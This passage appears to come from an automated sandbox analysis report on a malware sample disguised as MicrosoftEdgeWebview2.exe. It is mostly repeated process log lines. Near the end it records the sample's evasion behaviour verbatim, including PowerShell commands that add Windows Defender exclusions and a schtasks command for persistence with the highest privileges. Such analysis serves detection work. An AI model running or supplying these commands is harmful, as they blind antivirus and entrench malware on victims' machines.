            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Memory allocated: E30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Memory allocated: 1ABA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 11C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1ACB0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 25E0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1A850000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1240000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1AF40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 2580000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1A6F0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: F10000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Memory allocated: 1AA60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Window / User API: threadDelayed 2411
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Window / User API: threadDelayed 7368
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6146
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3562
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6800
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2905
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7574
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2016
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7018
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2581
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe TID: 8120 | Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848 | Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572 | Thread sleep count: 7574 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828 | Thread sleep count: 2016 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1852 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 | Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 3940 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 7840 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 8004 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe TID: 8084 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | File Volume queried: C:\ FullSizeInformation
            Source: MicrosoftEdgeWebview2.exe, 00000000.00000002.2956120617.000000001BAF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgx2
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Queries volume information: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe VolumeInformation
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
